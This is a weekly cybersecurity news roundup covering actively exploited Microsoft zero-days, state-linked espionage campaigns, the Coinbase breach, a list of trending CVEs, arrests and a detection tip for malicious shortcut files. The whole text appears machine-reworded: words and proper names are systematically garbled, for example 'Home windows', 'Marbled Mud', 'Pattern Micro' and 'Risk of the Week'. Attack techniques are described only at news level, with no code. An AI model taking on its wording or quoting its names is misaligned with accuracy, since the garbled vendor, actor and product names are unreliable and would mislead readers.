Might 19, 2025Ravie LakshmananThreat Intelligence / Cybersecurity
Cybersecurity leaders aren’t simply coping with assaults—they’re additionally defending belief, preserving techniques working, and sustaining their group’s repute. This week’s developments spotlight a much bigger situation: as we rely extra on digital instruments, hidden weaknesses can quietly develop.
Simply fixing issues is not sufficient anymore—resilience must be constructed into every thing from the bottom up. Which means higher techniques, stronger groups, and clearer visibility throughout the complete group. What’s displaying up now is not simply danger—it is a clear sign that performing quick and making good selections issues greater than being excellent.
This is what surfaced—and what safety groups cannot afford to miss.
⚡ Risk of the Week
Microsoft Fixes 5 Actively Exploited 0-Days — Microsoft addressed a complete of 78 safety flaws in its Patch Tuesday replace for Might 2025 final week, out of which 5 of them have come beneath energetic exploitation within the wild. The vulnerabilities embody CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709. It is at the moment not identified in what context these defects have been exploited, who’s behind them, and who was focused in these assaults.
🔔 High Information
Marbled Mud Exploits Output Messenger 0-Day — Microsoft revealed {that a} Türkiye-affiliated risk actor codenamed Marbled Mud exploited as zero-day a safety flaw in an Indian enterprise communication platform referred to as Output Messenger as a part of a cyber espionage assault marketing campaign since April 2024. The assaults, the corporate mentioned, are related to the Kurdish army working in Iraq. The assaults exploited CVE-2025-27920, a listing traversal vulnerability affecting model 2.0.62 that permits distant attackers to entry or execute arbitrary information. It was addressed in December 2024.
Konni APT Focuses on Ukraine in New Phishing Marketing campaign — The North Korea-linked risk actor often called Konni APT has been attributed to a phishing marketing campaign focusing on authorities entities in Ukraine, indicating the risk actor’s focusing on past Russia amidst the continuing Russo-Ukrainian struggle. Proofpoint, which disclosed particulars of the exercise, mentioned the target of the assaults is to gather intelligence on the “trajectory of the Russian invasion.” The assault chains entail the usage of phishing emails that impersonate a fictitious senior fellow at a non-existent suppose tank, tricking recipients into visiting credential harvesting pages or downloading malware that may conduct intensive reconnaissance of the compromised machines.
Coinbase Discloses Information Breach — Cryptocurrency big Coinbase disclosed that unknown cyber actors broke into its techniques and stole account knowledge for a small subset of its clients. The exercise bribed its buyer help brokers primarily based in India to acquire a listing of consumers, who have been then approached as a part of a social engineering assault to switch their digital belongings to a pockets beneath the risk actor’s management. The attackers additionally unsuccessfully tried to extort the corporate for $20 million on Might 11, 2025, by claiming to have details about sure buyer accounts in addition to inside paperwork. The compromised brokers have since been terminated. Whereas no passwords, non-public keys, or funds have been uncovered, the attackers made away with some quantity of private info, together with names, addresses, cellphone numbers, electronic mail addresses, authorities ID photographs, and account balances. Coinbase didn’t disclose what number of of its clients fell for the rip-off. Apart from voluntarily reimbursing retail clients who have been duped into sending cryptocurrency to scammers, Coinbase is providing a $20 million reward to anybody who can assist determine and produce down the perpetrators of the cyber assault.
APT28 Behind Assaults Concentrating on Webmail Companies — APT28, a hacking group linked to Russia’s Predominant Intelligence Directorate (GRU), has been focusing on webmail servers comparable to Roundcube, Horde, MDaemon, and Zimbra by way of cross-site scripting (XSS) vulnerabilities. The assaults, ongoing since no less than 2023, focused governmental entities and protection corporations in Jap Europe, though governments in Africa, Europe, and South America have been additionally singled out. The victims in 2024 alone included officers from regional nationwide governments in Ukraine, Greece, Cameroon and Serbia, army officers in Ukraine and Ecuador, and staff of protection contracting corporations in Ukraine, Romania and Bulgaria. The group’s spear-phishing marketing campaign used pretend headlines mimicking outstanding Ukrainian information shops just like the Kyiv Put up in regards to the Russia-Ukraine struggle, seemingly in an try and entice targets into opening the messages utilizing the affected webmail shoppers. Those that opened the e-mail messages utilizing the affected webmail shoppers have been served, by way of the XSS flaws, a customized JavaScript payload able to exfiltrating contacts and electronic mail knowledge from their mailboxes. One of many payloads might steal passwords and two-factor authentication codes, permitting the attackers to bypass account protections. The malware can also be designed to reap the e-mail credentials, both by tricking the browser or password supervisor into pasting these credentials right into a hidden type or getting the person to sign off, whereupon they have been served a bogus login web page.
Earth Ammit Breaches Drone Provide Chains to Goal Taiwan and South Korea — The risk actor often called Earth Ammit focused a broader vary of organizations than simply Taiwanese drone producers, as initially supposed. Whereas the set of assaults was believed to be confined to drone producers in Taiwan, a subsequent evaluation has uncovered that the marketing campaign is extra broader and sustained in scope than beforehand thought, hitting the heavy business, media, know-how, software program providers, healthcare, satellite tv for pc, and military-adjacent provide chains, and cost service suppliers in each South Korea and Taiwan. The assaults focused software program distributors and repair suppliers as a option to attain their desired victims, who have been the distributors’ downstream clients. “Earth Ammit’s technique centered round infiltrating the upstream section of the drone provide chain. By compromising trusted distributors, the group positioned itself to focus on downstream clients – demonstrating how provide chain assaults can ripple out and trigger broad, world penalties,” Pattern Micro famous. “Earth Ammit’s long-term objective is to compromise trusted networks by way of provide chain assaults, permitting them to focus on high-value entities downstream and amplify their attain.”
️🔥 Trending CVEs
Attackers love software program vulnerabilities—they’re simple doorways into your techniques. Each week brings contemporary flaws, and ready too lengthy to patch can flip a minor oversight into a serious breach. Beneath are this week’s vital vulnerabilities that you must find out about. Have a look, replace your software program promptly, and hold attackers locked out.
This week’s record consists of — CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, CVE-2025-32709 (Microsoft Home windows), CVE-2025-42999 (SAP NetWeaver), CVE-2024-11182 (MDaemon), CVE-2025-4664 (Google Chrome), CVE-2025-4632 (Samsung MagicINFO 9 Server), CVE-2025-32756 (Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera), CVE-2025-4427, CVE-2025-4428 (Ivanti Endpoint Supervisor Cellular), CVE-2025-3462, CVE-2025-3463 (ASUS DriverHub), CVE-2025-47729 (TeleMessage TM SGNL), CVE-2025-31644 (F5 BIG-IP), CVE-2025-22249 (VMware Aria Automation), CVE-2025-27696 (Apache Superset), CVE-2025-4317 (TheGem WordPress theme), CVE-2025-23166 (Node.js), CVE-2025-47884 (Jenkins OpenID Join Supplier Plugin), CVE-2025-47889 (Jenkins WSO2 Oauth Plugin), CVE-2025-4802 (Linux glibc), and CVE-2025-47539 (Eventin plugin).
📰 Across the Cyber World
Attackers Leverage PyInstaller to Drop Infostealers on Macs — Attackers are utilizing PyInstaller to deploy info stealers on macOS techniques. These ad-hoc signed samples bundle Python code into Mach-O executables utilizing PyInstaller, permitting them to be run with out requiring Python to be put in or meet model compatibility necessities. “As infostealers proceed to change into extra prevalent within the macOS risk panorama, risk actors will proceed the seek for new methods to distribute them,” Jamf mentioned. “Whereas the usage of PyInstaller to package deal malware will not be unusual, this marks the primary time we have noticed it getting used to deploy an infostealer on macOS.”
Kosovo Nationwide Extradited to the U.S. for Working BlackDB.cc — A 33-year-old Kosovo nationwide named Liridon Masurica has been extradited to the USA to face costs of working an internet cybercrime market energetic since 2018. He has been charged with 5 counts of fraudulent use of unauthorized entry units and one depend of conspiracy to commit entry system fraud. If convicted on all counts, Masurica faces a most penalty of 55 years in federal jail. He was taken into custody by authorities in Kosovo on December 12, 2024. Masurica is alleged to be the lead administrator of BlackDB.cc from 2018 to the current. “BlackDB.cc illegally supplied on the market compromised account and server credentials, bank card info, and different personally identifiable info of people primarily situated in the USA,” the Justice Division mentioned. “As soon as bought, cybercriminals used the gadgets bought on BlackDB.cc to facilitate a variety of criminality, together with tax fraud, bank card fraud, and id theft.”
Former BreachForums Admin to Pay $700k in Healthcare Breach — Conor Brian Fitzpatrick, aka Pompompurin, a former administrator of the BreachForums cybercrime discussion board, will forfeit roughly $700,000 in a civil lawsuit settlement associated to Nonstop Well being, a medical insurance firm whose buyer knowledge was posted on the market on the discussion board in 2023. Fitzpatrick was sentenced to time served final yr, however he went on to violate the phrases of his launch. He’s set to be resentenced subsequent month.
Tor Broadcasts Oniux for Kernel-Degree Tor Isolation — The Tor challenge has introduced a brand new command-line utility referred to as oniux that gives Tor community isolation for third-party functions utilizing Linux namespaces. This successfully creates a completely remoted community atmosphere for every software, stopping knowledge leaks even when the app is malicious or misconfigured. “Constructed on Arti, and onionmasq, oniux drop-ships any Linux program into its personal community namespace to route it via Tor and strips away the potential for knowledge leaks,” the Tor challenge mentioned. “In case your work, activism, or analysis calls for rock-solid site visitors isolation, oniux delivers it.”
DoJ Fees 12 Extra in RICO Conspiracy — The U.S. Division of Justice introduced costs in opposition to 12 extra folks for his or her alleged involvement in a cyber-enabled racketeering conspiracy all through the USA and overseas that netted them greater than $263 million. A number of of those people are mentioned to have been arrested within the U.S., with two others residing in Dubai. They face costs associated to RICO conspiracy, conspiracy to commit wire fraud, cash laundering, and obstruction of justice. The defendants are additionally accused of stealing over $230 million in cryptocurrency from a sufferer in Washington D.C. “The enterprise started no later than October 2023 and continued via March 2025,” the Justice Division mentioned. “It grew from friendships developed on on-line gaming platforms. Members of the enterprise held completely different duties. The varied roles included database hackers, organizers, goal identifiers, callers, cash launderers, and residential burglars focusing on {hardware} digital forex wallets.” The assaults concerned database hackers breaking into web sites and servers to acquire cryptocurrency-related databases or buying databases on the darkish internet. The miscreants then decided essentially the most useful targets and cold-called them, utilizing social engineering to persuade them their accounts have been the topic of cyber assaults and that they have been serving to them take steps to safe their accounts. The tip objective of those assaults was to siphon the cryptocurrency belongings, which have been then laundered and transformed into fiat U.S. forex within the type of bulk money or wire transfers. The cash was then used to fund a lavish life-style for the defendants. “Following his arrest in September 2024 and persevering with whereas in pretrial detention, Lam is alleged to have continued working with members of the enterprise to go and obtain instructions, accumulate stolen cryptocurrency, and have enterprise members purchase luxurious Hermes Birkin luggage and hand-deliver them to his girlfriend in Miami, Florida,” the company mentioned.
ENISA Launches EUVD Vulnerability Database — The European Union launched a brand new vulnerability database referred to as the European Vulnerability Database (EUVD) to offer aggregated info relating to safety points affecting varied services. “The database gives aggregated, dependable, and actionable info comparable to mitigation measures and exploitation standing on cybersecurity vulnerabilities affecting Data and Communication Expertise (ICT) services,” the European Union Company for Cybersecurity (ENISA) mentioned. The event comes within the wake of uncertainty over MITRE’s CVE program within the U.S., after which the U.S. Cybersecurity and Infrastructure Safety Company (CISA) stepped in on the final minute to increase their contract with MITRE for one more 11 months to maintain the initiative working.
3 Data Stealers Detected within the Wild — Cybersecurity researchers have uncovered the workings of three completely different info stealer malware households, codenamed DarkCloud Stealer, Chihuahua Stealer, and Pentagon Stealer, which are able to extracting delicate knowledge from compromised hosts. Whereas DarkCloud has been marketed in hacking boards as early as January 2023, assaults distributing the malware have primarily centered on authorities organizations since late January 2025. DarkCloud is distributed as AutoIt payloads by way of phishing emails utilizing PDF buy order lures that show a message claiming their Adobe Flash Participant is outdated. Chihuahua Stealer, then again, is a .NET-based malware that employs an obfuscated PowerShell script shared via a malicious Google Drive doc. First found in March 2025, Pentagon Stealer makes use of Golang to appreciate its objectives. Nonetheless, a Python variant of the identical stealer was detected no less than a yr prior when it was propagated by way of pretend Python packages uploaded to the PyPI repository.
Kaspersky Outlines Malware Tendencies for Industrial Techniques in Q1 2025 — Kaspersky revealed that the share of ICS computer systems on which malicious objects have been blocked in Q1 2025 remained unchanged from This fall 2024 at 21.9%. “Regionally, the share of ICS computer systems on which malicious objects have been blocked ranged from 10.7% in Northern Europe to 29.6% in Africa,” the Russian safety firm mentioned. “The biometrics sector led the rating of the industries and OT infrastructures surveyed on this report when it comes to the share of ICS computer systems on which malicious objects have been blocked.” The first classes of detected malicious objects included malicious scripts and phishing pages, denylisted web sources, and backdoors, and keyloggers.
Linux Flaws Surge by 967% in 2024 — The variety of newly found Linux and macOS vulnerabilities elevated dramatically in 2024, rising by 967% and 95% in 2024. The yr was additionally marked by a 96% leap in exploited vulnerabilities from 101 in 2023 to 198 in 2024, and an unprecedented 37% rise in vital flaws throughout key enterprise functions. “The overall variety of software program vulnerabilities grew by 61% YoY in 2024, with vital vulnerabilities rising by 37.1% – a major growth of the worldwide assault floor and publicity of vital weaknesses throughout various software program classes,” Action1 mentioned. “Exploits spiked 657% in browsers and 433% in Microsoft Workplace, with Chrome main all merchandise in identified assaults.” However in a bit of excellent information, there was a lower in distant code execution vulnerabilities for Linux (-85% YoY) and macOS (-44% YoY).
Europol Broadcasts Takedown of Faux Buying and selling Platform — Legislation enforcement authorities have disrupted an organized crime group that is assessed to be liable for defrauding greater than 100 victims of over €3 million ($3.4 million) via a pretend on-line funding platform. The hassle, a joint train carried out by Germany, Albania, Cyprus, and Israel, has additionally led to the arrest of a suspect in Cyprus. “The legal community lured victims with the promise of excessive returns on investments via a fraudulent on-line buying and selling platform,” Europol mentioned. “After the victims made preliminary smaller deposits, they have been pressured to speculate bigger quantities of cash, manipulated by pretend charts displaying fabricated earnings. Criminals posing as brokers used psychological ways to persuade the victims to switch substantial funds, which have been by no means invested however straight pocketed by the group.” Two different suspects have been beforehand arrested from Latvia in September 2022 as a part of the multi-year probe into the legal community.
New “defendnot” Device Can Disable Home windows Defender — A safety researcher who goes by the web alias es3n1n has launched a device referred to as “defendnot” that may disable Home windows Defender via a little-known API. “There is a WSC (Home windows Safety Middle) service in Home windows which is utilized by antiviruses to let Home windows know that there is another antivirus within the hood and it ought to disable Home windows Defender,” the researcher defined. “This WSC API is undocumented and moreover requires folks to signal an NDA with Microsoft to get its documentation.”
Rogue Communication Units Present in Some Chinese language Photo voltaic Energy Inverters — Reuters reported that U.S. vitality officers are reassessing the chance posed by Chinese language-made solar energy inverters after unexplained communication gear was discovered inside a few of them. The rogue elements are designed to offer further, undocumented communication channels that would enable firewalls to be circumvented remotely, in response to two folks accustomed to the matter. This might then be used to change off inverters remotely or change their settings, enabling dangerous actors to destabilize energy grids, injury vitality infrastructure, and set off widespread blackouts. Undocumented communication units, together with mobile radios, have additionally been present in some batteries from a number of Chinese language suppliers, the report added.
Israel Arrest Suspect Behind 2022 Nomad Bridge Crypto Hack — Israeli authorities have arrested and accepted the extradition of a Russian-Israeli twin nationwide Alexander Gurevich over his alleged involvement within the Nomad Bridge hack in August 2022 that allowed hackers to steal $190 million. Gurevich is claimed to have conspired with others to execute an exploit for the bridge’s Reproduction good contract and launder the ensuing proceeds via a classy, multi-layered operation involving privateness cash, mixers, and offshore monetary entities. “Gurevich performed a central function in laundering a portion of the stolen funds. Blockchain evaluation reveals that wallets linked to Gurevich acquired stolen belongings inside hours of the bridge breach and started fragmenting the funds throughout a number of blockchains,” TRM Labs mentioned. “He then employed a basic mixer stack: transferring belongings via Twister Money on Ethereum, then changing ETH to privateness cash comparable to Monero (XMR) and Sprint.”
Utilizing V8 Browser Exploits to Bypass WDAC — Researchers have uncovered a classy method that leverages weak variations of the V8 JavaScript engine to bypass Home windows Defender Software Management (WDAC). “The assault state of affairs is a well-recognized one: deliver alongside a weak however trusted binary, and abuse the truth that it’s trusted to achieve a foothold on the system,” IBM X-Power mentioned. “On this case, we use a trusted Electron software with a weak model of V8, changing principal.js with a V8 exploit that executes stage 2 because the payload, and voila, we’ve native shellcode execution. If the exploited software is whitelisted/signed by a trusted entity (comparable to Microsoft) and would usually be allowed to run beneath the employed WDAC coverage, it may be used as a vessel for the malicious payload.” The method builds upon earlier findings that make it doable to sidestep WDAC insurance policies by backdooring trusted Electron functions. Final month, CerberSec detailed one other technique that employs WinDbg Preview to get round WDAC insurance policies.
🎥 Cybersecurity Webinars
DevSecOps Is Damaged — This Repair Connects Code to Cloud to SOC
Trendy functions do not dwell in a single place—they span code, cloud, and runtime. But safety remains to be siloed. This webinar reveals why securing simply the code is not sufficient. You will find out how unifying AppSec, cloud, and SOC groups can shut vital gaps, cut back response occasions, and cease assaults earlier than they unfold. In case you’re nonetheless treating dev, infra, and operations as separate issues, it is time to rethink.
🔧 Cybersecurity Instruments
Qtap → It’s a light-weight eBPF device for Linux that reveals what knowledge is being despatched and acquired—earlier than or after encryption—with out altering your apps or including proxies. It runs with minimal overhead and captures full context like course of, person, and container information. Helpful for auditing, debugging, or analyzing app conduct when supply code is not obtainable.
Checkov → It’s a quick, open-source device that scans infrastructure-as-code and container packages for misconfigurations, uncovered secrets and techniques, and identified vulnerabilities. It helps Terraform, Kubernetes, Docker, and extra—utilizing built-in safety insurance policies and Sigma-style guidelines to catch points early within the growth course of.
TrailAlerts → It’s a light-weight, serverless AWS-native device that provides you full management over CloudTrail detections utilizing Sigma guidelines—without having a SIEM. It is preferrred for groups who wish to write, model, and handle their very own alert logic as code, however discover CloudWatch guidelines too restricted or complicated. Constructed totally on AWS providers like Lambda, S3, and DynamoDB, TrailAlerts allows you to detect suspicious exercise, correlate occasions, and ship alerts via SNS or SES—with out managing infrastructure or paying for unused capability.
🔒 Tip of the Week
Catch Hidden Threats in Recordsdata Customers Belief Too A lot → Hackers are utilizing a quiet however harmful trick: hiding malicious code inside information that look protected — like desktop shortcuts, installer information, or internet hyperlinks. These aren’t basic malware information. As an alternative, they run trusted apps like PowerShell or curl within the background, utilizing fundamental person actions (like opening a file) to silently infect techniques. These assaults usually go undetected as a result of the information appear innocent, and no exploits are used — simply misuse of regular options.
To detect this, concentrate on conduct. For instance, .desktop information in Linux that run hidden shell instructions, .lnk information in Home windows launching PowerShell or distant scripts, or macOS .app information silently calling terminal instruments. These aren’t uncommon anymore — attackers know defenders usually ignore these paths. They’re particularly harmful as a result of they do not want admin rights and are simple to cover in shared folders or phishing hyperlinks.
You possibly can spot these threats utilizing free instruments and easy guidelines. On Home windows, use Sysmon and Sigma guidelines to alert on .lnk information beginning PowerShell or suspicious youngster processes from explorer.exe. On Linux or macOS, use grep or discover to scan .desktop and .plist information for odd execution patterns. To check your defenses, simulate these assault paths utilizing MITRE CALDERA — it is free and allows you to safely mannequin real-world attacker conduct. Specializing in these ignored execution paths can shut a serious hole attackers depend on each day.
Conclusion
The headlines could also be over, however the work is not. Whether or not it is rechecking assumptions, prioritizing patches, or updating your response playbooks, the suitable subsequent step is never dramatic—however at all times decisive. Select one, and transfer with intent.
Discovered this text fascinating? Observe us on Twitter and LinkedIn to learn extra unique content material we publish.
